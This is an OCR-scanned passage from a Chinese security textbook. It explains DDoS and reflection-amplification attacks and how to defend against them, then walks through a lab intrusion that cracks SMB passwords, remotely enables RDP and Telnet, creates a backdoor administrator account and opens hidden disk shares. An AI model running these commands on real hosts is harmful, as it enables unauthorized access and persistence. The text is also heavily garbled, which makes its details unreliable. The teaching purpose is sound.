6.3.8 分 布 式 拒绝 服务 攻击 


1. 分 布 式 拒绝 服务 攻击 的 原理 

分 布 式 拒绝 服务 (distributed denial of services, DDoS) 攻 击 是 一 种 基于 DoS 的 特殊 形 
式 的 拒绝 服务 攻击 ,是 一 种 分 布 . 协 作 的 大 规模 攻击 方式 ,主要 瞄准 比较 大 的 站 点 , 像 商 业 公 
司 、 搜 索引 擎 或 政府 部 门 的 站 点 。 与 早期 的 DoS 相 比 ,DDoS 借助 数 百 台 、 数 千 台 其 至 数 万 
台 受 控制 的 机 器 向 同一 台 机 器 同时 发 起 攻击 ,如 图 6-9 所 示 , 这 种 来 势 迅 猛 的 攻击 令 人 难以 
防备 ,具有 很 大 的 破坏 力 。 














图 6-9 分 布 式 拒绝 服务 攻击 


DDoS 攻击 分 为 3 层 : 攻击 者 、 主 控 端 和 代理 端 ,三 者 在 攻击 中 扮演 着 不 同 的 角色 。 

(1) 攻击 者 。 攻 击 者 所 用 的 计算 机 是 攻击 主 控 台 ,可 以 是 网 络 上 的 任何 一 台 主 机 。 攻 
击 者 操纵 整个 攻击 过 程 , 它 向 主 控 端 发 送 攻击 命令 。 

(2) 主 控 端 。 主 控 端 是 攻击 者 非法 侵入 并 控制 的 一 批 主机 ,这 些 主机 还 分 别 控制 着 大 
量 的 代理 主机 。 在 主 控 端 主机 上 安装 了 特定 的 程序 ,因此 它们 可 以 接收 攻击 者 发 来 的 特殊 
指令 ,并 且 可 以 把 这 些 命令 发 送 到 代理 主机 上 。 

(3) 代理 端 。 代 理 端 同样 也 是 攻击 者 侵入 并 控制 的 一 批 主机 ,它们 上 面 运行 攻击 器 程 
序 ,接收 和 运行 主 控 端 发 来 的 命令 。 代 理 端 主机 是 攻击 的 执行 者 ,真正 向 受害 者 主机 发 动 
攻击 。 

攻击 者 发 起 DDoS 攻击 的 第 一 步 ,就 是 寻找 在 Internet 上 有 漏洞 的 主机 ,进入 系统 后 在 
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其 上 面 安 装 后 门 程序 ,攻击 者 入 侵 的 主机 越 多 ,他 的 攻击 队伍 就 越 壮 大 。 第 二 步 是 在 被 入 侵 
主机 上 安装 攻击 程序 ,其 中 一 部 分 主机 充当 攻击 的 主 控 端 , 另 一 部 分 主机 充当 攻击 的 代理 
端 ,最 后 各 部 分 主机 各 司 其 职 , 在 攻击 者 的 调 遗 下 对 攻击 对 象 发 起 攻击 。 由 于 攻击 者 在 幕后 
操纵 ,所 以 在 攻击 时 不 会 受到 监控 系统 的 跟踪 ,身份 不 容易 被 发 现 。 

DDoS 攻击 实施 起 来 有 一 定 的 难度 , 它 要 求 攻击 者 必须 具备 入 侵 他 人 计算 机 的 能 力 。 
但 是 很 不 幸 的 是 一 些 傻瓜 式 的 黑客 程序 的 出 现 ,这 些 程序 可 以 在 几 秒 钟 内 完成 人 侵 和 攻 才 
程序 的 安装 ,使 发 动 DDoS 攻击 变 成 一 件 轻而易举 的 事情 。 

2. 分 布 式 拒 绝 服务 攻击 的 防范 

到 目前 为 止 ,对 DDoS 的 防御 还 是 比较 困难 的 。 首 先 ,这 种 攻击 是 利用 了 TCP/IP 协议 
的 漏洞 ,要 完全 抵御 DDoS 攻击 从 原理 上 讲 不 太 现实 。 就 好 像 有 1000 个 人 同时 给 你 家 里 打 
电话 ,这 时 候 你 的 朋友 还 打 得 进来 吗 ? 虽然 人 们 不 能 完全 杜绝 DDoS, 但 还 是 可 以 尽量 避免 
它 给 系统 带 来 更 大 的 危害 。 

(1) 在 服务 上 关闭 不 必要 的 服务 ,限制 同时 打开 的 SYN 半 连 接 数目 ,缩短 SYN 半 连 接 
的 超时 时 间 ,及 时 更 新 系统 补丁 。 

(2) 在 防火 墙 方面 ,禁止 对 主机 的 非 开 放 服务 的 访问 ,限制 同时 打开 的 SYN 最 大 连接 
数 ,启用 防火 墙 的 防 DDoS 的 功能 ,严格 限制 对 外 开放 的 服务 器 的 向 外 访问 以 防止 自己 的 服 
务 器 被 当 作 倪 偶 机 。 

(3) 在 路 由 器 方面 ,使 用 访问 控制 列表 (ACL) 过 滤 ,设置 SYN 数据 包 流量 速率 ,升级 版 
本 过 低 的 操作 系统 ,为 路 由 器 做 好 日 志 记录 。 

(4) ISP/ICP 要 注意 自己 管理 范围 内 的 客户 托管 主机 不 要 成 为 倪 介 机 ,因为 有 些 托管 
主机 的 安全 性 较 差 ,应 该 和 客户 搞 好 关系 ,努力 解决 可 能 存在 的 问题 。 

(5) 骨干 网 络 运 营 商 在 自己 的 出 口 路 由 器 上 进行 源 IP 地 址 的 验证 ,如 果 在 自己 的 路 由 
表 中 没有 用 到 这 个 数据 包 源 IP 的 路 由 ,就 丢掉 这 个 包 。 这 种 方法 可 以 阻止 黑客 利用 伪造 的 
源 IP 地 址 来 进行 分 布 式 拒绝 服务 攻击 。 当 然 这 样 做 可 能 会 降低 路 由 器 的 效率 ,这 也 是 骨干 
网 络 运营 商 非常 关注 的 问题 ,所 以 这 种 做 法 真正 实施 起 来 还 很 困难 。 

对 分 布 式 拒绝 服务 的 原理 与 应 付 方法 的 研究 一 直 在 进行 中 ,找到 一 个 既 有 效 又 切实 可 
行 的 方案 不 是 一 朝 一 夕 的 事情 。 但 目前 至 少 可 以 做 到 把 自己 的 网 络 与 主机 维护 好 ,首先 让 
自己 的 主机 不 成 为 被 人 利用 的 对 象 去 攻击 别人 ;其 次 ,在 受到 攻击 的 时 候 , 要 尽量 保存 证 据 ， 
以 便 事后 追查 ,一 个 良好 的 网 络 和 系统 日 志 是 必要 的 。 
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6.3.9 分 布 式 反 射 型 拒绝 服务 攻击 


1. 分 布 式 反射 型 拒绝 服务 的 攻击 原理 及 特点 

分 布 式 拒绝 服务 (DDoS) 攻 击 是 指 黑客 通过 远程 控制 技术 ,控制 大 量 服务 器 或 计算 机 终 
端 (俗称 "肉鸡 ”对 攻击 目标 发 起 拒绝 服务 攻击 ,从 而 成 倍 地 提高 攻击 威力 。 

分 布 式 反 射 型 拒绝 服务 (distributed reflection denial of service, DRDoS) 攻 击 与 DDoS 
攻击 的 不 同 之 处 在 于 黑客 不 直接 控制 “肉鸡 ”对 攻击 目标 发 起 攻击 ,而 是 利用 互联 网 的 一 些 
网 络 服务 以 及 对 应 开放 服务 的 大 量 服务 器 或 终端 ,伪造 攻击 目标 地 址 向 这 些 服务 器 或 终端 
发 送 大 量 伪造 的 请 求 包 ,使 得 服务 器 或 终端 向 攻击 目标 反馈 大 量 应 答 包 ,间接 对 攻击 目标 发 
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起 攻击 。 

分 布 式 反射 型 拒绝 服务 的 攻击 原理 如 图 6-10 所 示 ,黑客 (假设 IP 地 址 为 1. 1. 1.1) 想 要 
对 某 目 标 ( 假 设 IP 地 址 为 6. 6. 6. 6) 发 起 攻击 ,其 可 以 伪造 目标 IP 地 址 为 6. 6. 6. 6 向 大 量 开 
放 某 特定 服务 的 服务 器 或 终端 (图 中 IP 地 址 为 2. 2. 2. 2、3. 3. 3. 3 等 ) 发 起 服务 请 求 。 这 
些 服务 器 或 终端 收 到 请 求 后 ,将 进行 服务 应 答 ,由 于 请 求 包 中 的 源 地 址 是 伪造 的 耳 地 址 
6.6.6.6, 因 此 应 答 包 将 发 往 IP 地 址 为 6. 6. 6.6 的 目标 地 址 ,从 而 间接 对 目标 地 址 造成 攻击 
流量 。 











黑客 
TP 地址: 1.1.1.1 


开放 特定 服务 的 服务 器 
图 6-10 分 布 式 反射 型 拒绝 服务 攻击 原理 图 


分 布 式 反射 型 拒绝 服务 攻击 之 所 以 成 为 黑客 “青睐 "的 攻击 方式 ,主要 是 因为 其 具有 以 
下 几 个 显著 特点 。 

(1) 可 以 放大 攻击 效果 。 一 般 黑客 利用 发 起 反射 攻击 的 服务 ,往往 应 答 包 远大 于 请 求 
包 , 因 此 黑客 可 以 利用 较 小 的 代价 发 起 数 十 倍 甚至 数 百倍 的 攻击 流量 ,达到 “四两拨千斤 ”的 

(2) 攻击 易 发 起 。 可 被 利用 发 起 反射 攻击 的 服务 器 或 终端 往往 数量 多 、 分 布 广 , 且 通过 
扫描 就 能 掌握 互联 网 上 开放 服务 的 服务 器 或 终端 列表 ,黑客 仅 需要 向 这 些 服务 器 或 终端 发 
送 特 定 请 求 即 可 发 起 攻击 。 

(3) 便于 隐藏 攻击 者 。 一 方面 ,在 被 攻击 目标 端 .看 到 的 攻击 源 地 址 都 是 被 利用 反射 攻 
击 的 服务 器 或 终端 IP 地 址 ,无 法 看 到 黑客 自身 的 IP 地 址 ; 另 一 方面 ,在 被 利用 的 服务 器 或 
终端 侧 ,由 于 被 利用 的 服务 往往 都 是 使 用 无 连接 的 UDP 协议 ,黑客 可 以 伪造 攻击 目标 地 址 
发 起 请 求 流量 ,因而 在 这 些 服务 器 或 终端 侧 无 法 看 到 黑客 真实 的 IP 地 址 。 也 就 是 说 在 整个 
攻击 环节 中 ,黑客 的 真实 IP 地 址 都 没有 暴露 。 

2. 常见 分 布 式 反 射 型 拒绝 服务 攻击 类 型 

根据 分 布 式 反射 型 拒绝 服务 攻击 的 原理 .被 利用 发 起 反射 攻击 的 服务 需要 具备 两 个 要 
素 : 一 是 使 用 无 连接 的 UDP 协议 ,以 发 起 伪造 地 址 的 请 求 包 ; 二 是 应 答 包 大 于 请 求 包 , 从 而 
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可 以 放大 攻击 流量 。 

目前 互联 网 上 具备 以 上 要 素 的 服务 主要 有 DNS(domain name system, 域 名 系统 ,默认 
服务 端口 为 UDP 53 端口 )、NTP(network time protocol, 网 络 时 间 协 议 ,默认 服 务 端 口 为 
UDP 123 端口 )\UPnP(Cuniversal plug and play, 通 用 即 插 即 用 ,默认 服务 端口 为 UDP 1900 
端口 ) .CHARGEN (character gerenator protocol, 字 符 发 生 器 协议 ,默认 服务 端口 为 UDP 
19 端口 ) 等 。 其 对 应 的 分 布 式 反射 型 拒绝 服务 攻击 类 型 如 下 。 

1) DNS 分 布 式 反射 攻击 

DNS 是 域名 和 IP 地 址 相互 映射 的 一 个 分 布 式 数据 库 , 它 能 够 使 用 户 通过 直观 的 域名 
更 方便 地 访问 网 站 ,而 不 用 去 记 住 网 站 的 IP 地 址 。DNS 分 布 式 反 射 攻击 的 原理 是 攻击 者 
伪造 攻击 目标 地 址 向 互联 网 上 开放 递归 服务 的 大 量 DNS 服务 器 发 起 域名 请 求 。 这 些 服 务 
器 收 到 请 求 后 ,将 会 把 应 答 包 返回 给 攻击 目标 地 址 ,而 且 攻 击 者 发 起 的 请 求 往往 是 ANY 或 
者 TXT 类 型 ,应 答 包 往往 比 请 求 包 大 数 十 倍 甚至 数 百倍 ,从 而 利用 这 些 服务 器 对 攻击 目标 
发 起 放大 后 的 流量 攻击 。 据 调查 ,目前 互联 网 存在 约 2700 万 台 开 放 递 归 服 务 的 DNS 服务 
器 ,这 些 服务 器 均 存 在 被 黑客 利用 发 起 反射 攻击 的 可 能 。 

2) NTP 分 布 式 反射 攻击 

NTP 是 用 来 使 计算 机 时 间 同 步 化 的 一 种 协议 ,可 以 使 计算 机 对 其 服务 器 或 时 钟 源 (如 
石英 钟 .GPS 等 ) 做 同步 化 ,以 提供 高 精准 度 的 时 间 校 正 。NTP 分 布 式 反射 攻击 的 原理 是 攻 
击 者 伪造 攻击 目标 地 址 向 互联 网 上 开放 NTP 服务 的 大 量 服务 器 发 起 Monlist 请 求 。 这 些 
服务 器 收 到 请 求 后 ,将 会 把 应 答 包 返 回 给 攻击 目标 地 址 ,应答 包 中 包含 与 NTP 服务 器 进行 
过 时 间 同 步 的 最 后 600 个 客户 端的 IP 地 址 ,因此 应 答 包 往往 比 请 求 包 大 出 数 百倍 ,从 而 利 
用 这 些 服务 器 对 攻击 目标 发 起 放大 后 的 流量 攻击 。 

3) UPnP 分 布 式 反射 攻击 

UPnP 是 路 由 器 网络 摄像 头 、 智 能 电视 .打印 机 等 家 庭 终端 设备 普遍 应 用 一 种 网 络 通 
信 协 议 。 该 协议 的 主要 组 成 部 分 是 SSDP(simple service discovery protocol, 简 单 服务 发 现 
协议 ) 。UPnP 设备 间 通 过 SSDP 进行 相互 感知 ,利用 SOAP(simple object access protocol， 
简单 对 象 访问 协议 ) 来 获取 控制 信息 ,并 进行 信息 反馈 。UPnP 分 布 式 反射 攻击 的 原理 是 黑 
客 伪造 攻击 目标 地 址 向 大 量 UPnP 设备 发 起 恶意 请 求 , 进 而 利用 大 量 UPnP 设备 的 应 答 包 
对 攻击 目标 发 起 反射 攻击 ,通常 可 以 将 攻击 流量 放大 约 30 倍 。 所 有 连接 互联 网 的 UPnP 设 
备 都 有 可 能 成 为 黑客 利用 的 对 象 ,其 数量 以 数 千 万 计 。 

4) CHARGEN 分 布 式 反 射 攻击 

CHARGEN 是 一 种 发 送 字符 的 服务 ,开启 CHARGEN 服务 的 服务 器 收 到 客户 端 发 出 
的 UDP 包 后 ,将 发 送 一 个 数据 包 到 客户 端 ,其 中 包含 长 度 为 0 一 512 字 节 之 间 随 机 值 的 任意 
字符 。CHARGEN 分 布 式 反射 攻击 的 原理 是 黑客 伪造 攻击 目标 地 址 向 大 量 CHARGEN 服 
务 器 发 出 UDP 请 求 包 ,进而 利用 大 量 CHARGEN 服务 器 的 应 答 包 对 攻击 目标 发 起 反射 攻 
击 , 且 应 答 包 比 请 求 包 通常 要 大 出 数 十 倍 。 

3. 分 布 式 反射 型 拒绝 服务 攻击 的 防范 

分 布 式 反射 型 拒绝 服务 攻击 具有 隐藏 攻击 者 来 源 、 以 较 小 代价 实现 放大 攻击 规模 效果 、 
攻击 易 发 起 等 特点 ,因而 必 将 成 为 黑客 越 来 越 “ 青 睐 ”的 手段 ,也 将 对 我 国 公共 互联 网 安全 造 
成 越 来 越 大 的 威胁 。 因 此 要 积极 采取 有 效 措施 遏制 此 类 攻击 的 泛滥 ,建议 的 主要 措施 包括 
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以 下 几 点 。 

(1) 基础 电信 企业 要 进一步 加 强 虚假 源 地 址 流量 的 整治 工作 。 分 布 式 反 射 型 拒绝 服务 
攻击 的 前 提 是 要 伪造 攻击 目标 地 址 发 出 请 求 流量 ,而 虚假 源 地 址 流量 整治 工作 就 是 要 让 伪 
造 的 流量 无 法 发 出 ,从 而 切断 分 布 式 反射 型 拒绝 服务 攻击 的 源头 。 

(2) 互联 网 上 的 服务 器 或 终端 管理 者 要 加 强 安全 管理 。 首 先 要 关闭 服务 器 或 终端 无 关 
的 服务 端口 , 停 用 无 关 服 务 ,避免 成 为 黑客 利用 的 “弹药 ”, 例 如 个 人 终端 关闭 UDP 1900 端 
口 以 禁用 UPnP 服务 。 其 次 要 及 时 修补 相关 漏洞 ,并 设置 必要 的 访问 限制 ,例如 NTP 服务 
器 及 时 升级 NTP 版 本 、 禁 用 Monlist 功能 .并 设置 防火 墙 策略 限制 特定 IP 地 址 的 访问 
次 数 。 

(3) 重要 网 站 和 信息 系统 要 加 强 安全 防范 。 分 布 式 反射 型 拒绝 服务 攻击 具有 攻击 源 端 
口 固 定 的 特点 ,例如 DNS 分 布 式 反 射 攻击 的 攻击 源 端 口 为 UDP 53, 因 此 可 以 在 防火 墙 中 
设置 相关 策略 过 滤 此 类 攻击 流量 ,或 者 协调 基础 电信 企业 在 上 层 路 由 进行 流量 清洗 。 重 要 
网 站 和 信息 系统 自身 要 配置 相关 的 安全 检测 和 防范 设备 ,建立 和 基础 电信 企业 的 联动 机 制 ， 
及 时 发 现 和 处 置 此 类 攻击 。 


64 项 目 实 施 


6.4.1 任务 1: 黑客 入 侵 的 模拟 演示 


1. 任务 目标 

(1) 掌握 常用 黑客 人 侵 的 工具 及 其 使 用 方法 。 

(2) 了 解 黑客 人 侵 的 基本 过 程 。 

(3) 了 解 黑客 人 侵 的 危害 性 。 

2. 任务 内 容 

(1) 模拟 攻击 前 的 准备 工作 。 

(2) 利用 SBMCrack 软件 破解 远程 主机 B 的 弱 口 令 。 

(3) 利用 Recton 工具 远程 人 侵 主机 B。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 32bit 操作 系统 的 计算 机 1 台 ,作为 主机 A( 攻 击 机 ) 。 

(2) 安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 ,作为 主机 B( 被 攻击 机 ) 。 

(3) SBMCrack、Recton 工具 软件 各 1 套 。 

4. 任务 实施 步骤 

1) 模拟 攻击 前 的 准备 工作 

步骤 1: 由 于 本 次 模拟 攻击 所 用 到 的 工具 软件 均 可 被 较 新 的 杀毒 软件 和 防火 墙 检测 出 
来 并 自动 进行 隔离 或 删除 ,因此 ,在 模拟 攻击 前 要 先 将 两 台 主 机 安装 的 杀毒 软件 和 
Windows 防火 墙 等 全 部 关闭 。 

步骤 2: 在 默认 的 情况 下 ,两 台 主 机 的 IPC $ 共享 .默认 共享 .135 端口 和 WMI 
(Windows Management Instrumentation ,Windows 管理 规范 ) 服 务 均 处 于 开启 状态 ,在 主 
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机 B 上 禁用 Remote Desktop Services 服务 (主要 用 于 远程 桌面 连接 ) 。 

步骤 3: 设置 主机 A( 攻 击 机 ) 的 IP 地 址 为 192. 168. 10. 11 ,主机 B( 被 攻击 机 ) 的 IP 
地 址 为 192. 168. 10. 12(IP 地 址 可 以 根据 实际 情况 自行 设 定 ), 两 台 主 机 的 子 网 掩 码 均 为 
255. 255. 255.0。 设 置 完成 后 用 ping 命令 测试 两 台 主 机 ,保证 连接 成 功 。 

步骤 4: 打开 主机 B 的 “控制 面板 ”中 的 “管理 工具 ”, 执 行 “本 地 安全 策略 ”命令 ,在 “本 
地 策略 ”的 “安全 选项 ”中 找到 “网 络 访问 : 本 地 账户 的 共享 和 安全 模型 "策略 ,并 将 其 修改 为 
“经 典 一 对 本 地 用 户 进行 身份 验证 ,不 改变 其 本 来 身份 ”, 如 图 6-11 所 示 。 


网 络 访 问 :本 地 三 户 的 共享 和 安全 模型 属性 





图 6-11 网 络 访问 : 本 地 账户 的 共享 和 安全 模型 


2) 利用 SBMCrack 软件 破解 远程 主机 B 的 弱 口 令 

步骤 1: 在 主机 A 上 安装 SBMCrack 软件 。 在 用 户 名 字典 文件 user. txt 中 添加 用 户 名 
administrator、admin 等 ,每 个 用 户 名 占 一 行 ,中 间 不 要 有 空 行 。 

步骤 2: 在 弱 口令 字典 文件 pass. txt 中 添加 弱 口 令 ( 密 码 )123、321、213 等 ,每 个 弱 口令 
占 一 行 ,中 间 不 要 有 空 行 。 

说 明 由 于 本 次 模拟 攻击 只 是 演示 弱 口 令 的 攻击 过 程 ,因此 在 两 个 字典 文件 中 输入 的 
用 于 猜测 的 用 户 名 和 口令 都 比较 简单 ,只 有 几 条 。 在 实际 黑客 攻击 过 程 中 ,用 户 名 和 口令 字 
典 文件 中 多 达 几 千 甚至 上 万 条 记录 ,用 于 测试 的 用 户 名 和 口令 也 不 是 手工 输入 的 ,而 是 由 软 
件 自动 生成 的 ,这 些 记录 可 能 是 3 一 4 位 纯 数 字 或 纯 字母 的 所 有 组 合 , 也 可 能 是 一 些 使 用 频 
率 很 高 的 单词 或 字符 组 合 。 这 样 的 字典 可 能 在 几 分 钟 之 内 就 可 猜测 出 弱 口 令 。 

步骤 3: 运行 smbcrack2 -i 192. 168. 10. 12 -u user. txt -p pass. txt -P 1 -N 命令 ,结果 如 
6-12 所 示 ,可 见 已 破解 出 用 户 名 为 administrator, 口 令 ( 密 码 ) 为 123。 

参数 “-P 1 表示 通过 445 端口 进行 破解 ,默认 使 用 139 端口 ;参数 “-N” 表 示 通 过 NTLM 
认证 ,默认 通过 SMB 认证 。 

3) 利用 Recton 工具 远程 人 侵 主机 B 

(1) 远程 启动 Remote Desktop Services 服务 ,步骤 如 下 。 
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画 管理 员 : C\Windows\system32\cmd.exe 


| - calculate word Nunbe 
rotal 2 Password In File pass.txt. 
word crack on 192.168.18.12 Port 445 [NILM] 一 
8-BBKs?L] 


User: adninistrator Password: 123 


rotal accounts 3, conpronised 1, disabled 8. skiped 日 
Penetration ratio = 33.33 x 


- 88/89/16 22:54:59 h11 Done 











图 6-12 用 SBMCrack 破解 口令 





步 又 1: 在 主机 B 上 设置 允许 远程 桌面 连接 ,如 图 6-13 所 示 。 
步骤 2: 在 主机 A 中 运行 mstsc. exe 命令 ,打开 * 远 程 桌面 连接 ”对话 框 ,设置 远程 计算 
机 的 IP 地 址 为 192. 168. 10. 12 ,用 户 名 为 Administrator, 如 图 6-14 所 示 。 











系统 民 性 EE 
dE li 可 i | i [ET 
RE 
F 而 先 稳 各 语 术 这 全 机 疝 【 远程 桌面 
区 课 规 | 显示 _] 本 地 资源 | 程序“ 体验 _ 高 级 
登录 设置 
本 输入 远程 计算 机 的 名 称 。 
单 击 一 个 选 顺 ， 然后 指定 淮 可 以 连接 0 果 需 要 ) 。 HNMRE): [19e. 100.10.12 ” 
用 户 名 WINSERVER\Adnini str ator 


个 不 允许 连接 到 这 台 计算 机 加) 
他 允许 运行 任意 版 本 远程 点 面 的 计算 机 连接 咳 不 安全 QL) 


" 
te RRA) | 


当 您 连接 时 将 向 您 洞 问 凭据 
人 允许 我 保存 赁 据 ) 
连接 设置 
J | 





六 到 RDP 文件 或 打开 一 个 已 保存 的 连 





保存 S) | [ 另存 为 W)..，] | 打开) 





取消 应 用 只) 3 和 页 中 CE [CR 
图 6-13 ”允许 远程 桌面 连接 图 6-14 “远程 桌面 连接 ”对 话 框 











步骤 3: 单 击 “ 连 接 ” 按 钮 ,弹出 无 法 连接 到 远程 桌面 的 提示 信息 ,如 图 6-15 所 示 , 这 是 
因为 主机 B 上 没有 启用 Remote Desktop Services 服务 。 

步骤 4: 在 主机 A 中 运行 人 侵 工 具 Recton v2. 5; 在 Terminal 选项 卡 中 输入 远程 主机 
(主机 B) 的 IP 地 址 (192. 168. 10. 12)、 用 户 名 (administrtor) 密码 (123) ,端口 (3389) 保持 
不 变 , 并 选中 “自动 重启 " 复 选 框 ,如 图 6-16 所 示 
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@ 远程 点 面 由 于 以 下 原因 之 一 无 法 连接 到 远程 计算 机 : 


3) 在 网 络 上 远程 计算 机 不 可 用 


确保 打开 远程 计算 机 、 连 接 到 网 络 并 县 启 用 远程 访问 . 





图 6-15 无 法 连接 到 远程 桌面 


Terminal Telnet | cm 命令 | 日 志 | 重启 | 进程 | 服务 | 共享 | 种 植 者 | 








远程 启动 Terminal 服 务 
运程 主机 设置 
运程 主机 [321561012 


Ra ER 
saF 





[eer ] 














_ Ematdhe_ B89@163.com 


图 6-16 设置 远程 启动 Remote Desktop Services 服务 


步骤 5: 单 击 “ 开 始 执 行 ”按钮 , 则 会 启用 主机 B 上 的 Remote Desktop Services 服务 (在 
Windows Server 2003 中 称 为 Terminal Services 服务 ) .然后 主机 B 会 自动 重新 启动 。 

步骤 6: 主机 B 自动 重新 启动 完成 后 ,在 主机 A 上 再 次 运行 mstsc. exe 命令 ,设置 远程 
计算 机 的 IP 地 址 (192. 168. 10. 12) 和 用 户 名 (Administrator) 后 , 单 击 “ 连 接 ? 按 钮 ,此 时 出 
现 了 远程 桌面 登录 界面 ,如 图 6-17 所 示 , 输 入 口令 (123) 后 即 可 实现 远程 桌面 登录 。 


输入 您 的 凭据 
这 些 任 据 将 用 于 连接 192.168.10.12。 


Administrator 
| ee 








图 6-17 远程 桌面 登录 界面 
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(2) 远程 启动 和 停止 Telnet 服务 ,步骤 如 下 。 


步骤 1: 在 远程 主机 B 上 ,通过 服务 器 管理 器 安装 “Telnet 服务 器 ”功能 ,如 图 6-18 


所 示 。 





田口 .WET frwework 3.5.1 功能 
口 BitLocker 驱动 器 加 密 
口 Branchcache 
口 pirecthecess 管理 控制 台 
口 arr 代理 上 的 BEC 


OD inaors Bionetric Franerork 

口 tindors Porershell 集 所 脚本 环境 ISE) 
田口 Windows Server Bacjeup 功能 

品 Windors Server 迁移 工具 

癌 windows TIFF IFilter 
田 口 indows 进程 洒 活 服务 

站 rinaews 内 部 教 据 库 





6-18 ”安装 “Telnet 服务 器 ”功能 


步骤 2: 运行 管理 工具 中 的 “服务 ”程序 ,打开 “服务 ”窗口 ,如 图 6-19 所 示 , 可 见 Telnet 


服务 默认 是 禁用 的 。 





Saart Card Renov. .多 许 系 
入 SP Trw 接收 本 
篇 Software Protection 启用 
萄 Special hdninist 允许 管 .. 
FP motification 

ssIP Discovery 

systen Event Hot. 


和 Thread Ordering 
坊 TP hutoConnect 5. 
TP YC Gatevay se 
坊 TPh Base Services 
UnP Device Most 
User Profile Ser. 
Virtud Disk 








6-19 “服务 ”窗口 
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步骤 3: 在 主机 A 上 ,在 Recton 程序 的 Telnet 选项 卡 中 输入 远程 主机 的 IP 地 址 .用 户 
名 和 密码 后 , 单 击 “ 开 始 执 行 ”按钮 , 即 可 远程 启动 主机 B 上 的 Telnet 服务 ,如 图 6-20 所 示 。 





@ Recton v 2.5 By D 驾 专用 版! 2005.12.30 [Es 
Terninal|[Teinet CID 命令 | 日 志 | 重启 | 进程 | 服务 | 共享 | 种植 者 | 








附加 设置 
远程 启动 /停止 Telnet 服 务 端 D: [2 rc 
运程 主机 设置 NTLM: |" 


运程 主机 |5216581012 


用 户 名 : annstator 























c 
密码 -一 
启动 关 
D 贺 专用 版 !! 
佛山 顺德 





E-matdhe_889G163 com 





图 6-20 远程 启动 Telnet 服务 


如 果 再 次 单 击 “ 开 始 执行 按钮, 则 会 远程 停止 主机 B 上 的 Telnet 服 


务 ; 
步骤 4: 远程 启动 主机 B 上 的 Telnet 服务 后 ,在 主机 A 上 安装 “Te 








装 net 客户 端 ” 功 能 ， 
运行 Telnet 192. 168. 10. 12 命令 ,与 远程 主机 B 建立 Telnet 连接 ,此 时 系统 询问 是 否 将 本 
机 密码 信息 送 到 远程 计算 机 (y/n) ,如 图 6-21 所 示 

国 Telnet 192.168.1012 Fs- 区 到 
使 用 Microsoft Telnet Client < 


Escape 字符 为 “CTRL+] 


码 信息 送 到 Internet 








图 6-21 系统 询问 是 否 发 送 本 机 密码 信息 
步骤 5: 输入 n 表示 否 (no) ,再 按 Enter 键 。 此 时 系统 要 求 输入 远程 主机 B 的 登录 用 户 


名 (login) 和 密码 (password) ,这 里 分 别 输入 administrator 和 123, 密 码 在 输入 时 没有 回 显 ， 
如 图 6-22 所 示 。 





0 Telnet 192.168.10.12 


Ee-Fe-a 


Melcone to Microsoft Telnet Service 


login: adninistrator 
password: 





图 6-22 输入 远程 主机 的 用 户 名 和 密码 
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步骤 6: 此 时 与 远程 主机 B 的 Telnet 连接 已 成 功 建立 ,并 出 现 “Microsoft Telnet 
Server” 的 提示 信息 。 输 入 “dir c:\" 命 令 , 即 可 显示 远程 主机 B 上 的 C 盘 根 目录 中 的 所 有 文 
件 和 文件 夹 信息 ,如 图 6-23 所 示 。 





Telnet 192.168.10.12 


PerfLogs 
Progran Piles 


9 修文 
5 才 误 17.453.912.964 商用 字 节 


IC:\Jsers\Adninistrator> 





TT » 








图 6-23 查看 远程 主机 上 的 C 盘 根 目录 





步骤 7: 黑客 可 以 利用 Telnet 连接 及 DOS 命令 ,在 远程 主机 上 建立 新 用 户 , 并 将 新 用 
户 提升 为 管理 员 ,如 执行 “net user userl 123/add” 命 令 表 示 新 建 用 户 userl ,密码 为 123; 再 
执行 “net localgroup administrators userl/add” 命 令 表 示 将 用 户 userl 加 入 管理 员 组 


Administrators 中 ,如 图 6-24 所 示 








BW Telnet 192.168.10.12 


dministrator 和 et user userl 123 /add 


jc: users hdninistrator>。 





图 6-24 ”新建 用 户 并 加 入 管理 员 组 


步骤 8: 此 时 ,可 在 主机 B 上 验证 是 否 新 增 了 用 户 userl ,并 隶属 于 Administrators 组 ， 
如 图 6-25 所 示 。 也 可 在 命令 提示 符 后 面 输入 “net user userl” 命 令 来 查看 验证 。 

步骤 9: 黑客 可 以 利用 新 建 的 管理 员 账 号 userl 作为 后 门 , 方 便 下 次 入 侵 该 计算 机 。 如 
果 需 要 远程 删除 该 账号 ,可 输入 “net user userl/del” 命 令 。 如 果 需 要 断 开本 次 Telnet 连 
接 , 可 输入 exit 命令 。 

(3) 在 远程 主机 上 执行 CMD 命令 ,步骤 如 下 。 

步骤 1: 在 "CMD 命令 ?选项 卡 中 ,输入 远程 主机 的 IP 地 址 、 用 户 名 和 密码 后 ,在 CMD 
文本 框 中 输入 “net share D$ 二 D:\" 命 令 . 如 图 6-26 所 示 , 单 击 “ 开 始 执行 按钮 , 即 可 开启 
远程 主机 的 D 盘 共 享 。 
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局 服务 和 应 用 程序 





图 6-25 验证 新 用 户 及 所 属 的 组 





一 一 一 一 一 一 一 一 一 一 
@ Recton v 2.5 By D 避 专用 版 ! 2005.12.30 ES) 
Terninal | Telnet [CID 命令 日 志 | 重启 | 进程 | 服务 | 共 引 种 植 者 | 




















附加 设置 一 一 一 一 


远程 执行 CD 命令 庙 D: [三 自动 重启 
运程 主机 设置 wmf 
运程 主机 : |1321681012 =MD: [rshaeD4-D\ 
用 户 名 istrator 会 IPC 上 传 到 HpT 载 


一 本 地 文件 
ES sgB[Fm 可 
| aaagE 户 可 











EE 
™ Ematkdhe_888@163.com 














图 6-26 ”开启 远程 主机 的 D 盘 共 享 


将 该 命令 “D$ "和 ”*D:? 中 的 D 换 成 CE 等 , 即 可 开启 远程 主机 的 C 盘 、 上 盘 等 的 共享 ， 
这 种 共享 方式 隐蔽 性 较 高 ,而 且 是 完全 共享 ,在 远程 主机 B 中 不 会 出 现 两 个 人 形 的 共享 
标志 。 
步骤 2: 此 时 车 在 主机 A 的 浏览 器 地 址 栏 中 输入 “*\\192. 168. 10. 12\d$ ”, 进 行 身份 认 
证 后 即 可 访问 主机 B 的 DD 盘 , 并 可 以 进行 复制 .删除 等 操作 ,如 图 6-27 所 示 。 
步骤 3: 如 果 需 要 关闭 远程 主机 的 D 盘 共 享 ,可 在 CMD 文本 框 中 输入 “net share D$/ 
del” 命 令 。 
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时 \\192.168.10.12\d$ ”| ss 万 
